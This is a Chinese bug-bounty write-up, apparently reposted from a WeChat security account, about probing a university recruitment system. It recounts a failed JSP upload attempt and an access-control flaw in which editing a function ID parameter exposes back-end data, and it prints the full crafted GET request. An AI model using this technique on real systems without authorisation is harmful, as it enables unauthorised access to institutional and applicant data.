0x00前言
大家好 我是Maosn 一个专注于在各种大佬之间摸鱼的硬核咸鱼
我又回来啦(我特嘛来辣)
难得有时间来和各位一起学习
话不多说 整活!
Ps:存货文章未深挖
0x01故事的开始
今天闲来无事看见教育src群里的大佬们都在秀自己的证书
就心想什么时候也能拥有自己的证书
说干就干,打开edu src,找到一个自己喜欢的证书
向着目标 开整!
目标站:https://www.xxxx.edu.cn/
找到以这个招聘系统
可见这个系统可以注册进去看看
0x02 无用的文件上传
登录后可发现有一个简历管理,应该会有上传点
建立一个简历发现有个证书管理
测试图片可以成功上传
改为jsp文件同可上传成功
但是发现文件地址应该是启用通过文件系统调用了
只可以下载 (O 漏!!!)
这个点无果,不出所料的未通过
0x03 “信息泄露”
没有收获但不是完全没有收获,在抓包是发现了一处参数
漏洞地址:
https://job.XXXX.edu.cn/base/hr/a.do?action=list&entityId=FM_MODULE&FM_SYS_ID=XXXX泄露招聘后台所有功能ID可调用
可见操作日志id为 42
我们在招聘系统后台构造包
或者点击任意功能修改id字段
GET /base/hr/a.do?action=list&entityId=FM_MODULE&FM_SYS_ID=XXXX&search.ID=42&_=1621843296198HTTP/1.1 Host: job.XXXX.edu.cnConnection: keep-alive Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36X-Requested-With: XMLHttpRequestSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://job.XXXXX.edu.cn/base/frame/main.jsp?FM_SYS_ID=XXXXXX&FM_SYS_CODE=SYSTEM_RECRUITAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,fr;q=0.8,en;q=0.7Cookie: JSESSIONID=5E58100228F66E8D59AEEEDED4EB45D8; JSESSIONID=5E58100228F66E8D59AEEEDED4EB45D8
将search.ID的值修改为想要功能的id
这里看一下操作日志
{"ORDER_NUM":"4","META":"T_RECRUIT_POST","MAIN_PAGE":"1521","OPEN_TYPE":"3","ID":"1320","UP_ID":"1313","NAME":"已发布职位"}
再次提交,好耶
0x04 后言
之后又发现其他使用这个系统的大学,成功拿下两张证书,双倍好耶
写在最后:
小白做测试的时候千万不要放过任何细节,以为任何一个细节就有可能会带领你少走很多弯路,直达目标。
原文始发于微信公众号(HACK学习君):实战 | 记一次教育src挖洞历程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论